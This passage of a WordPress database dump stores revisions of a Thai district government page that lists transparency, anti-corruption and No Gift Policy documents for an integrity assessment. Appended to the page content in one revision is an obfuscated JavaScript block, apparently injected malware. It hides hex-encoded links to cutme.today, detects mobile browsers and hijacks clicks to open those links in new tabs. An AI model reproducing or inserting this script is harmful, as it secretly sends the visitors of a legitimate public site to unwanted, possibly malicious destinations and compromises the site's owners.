href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-23 14:34:50','2024-08-23 07:34:50','',871,'http://pakhaeng.ssk.in.th/?p=1065',0,'revision','',0),
(1066,1,'2024-08-23 14:35:07','2024-08-23 07:35:07','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-7 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div 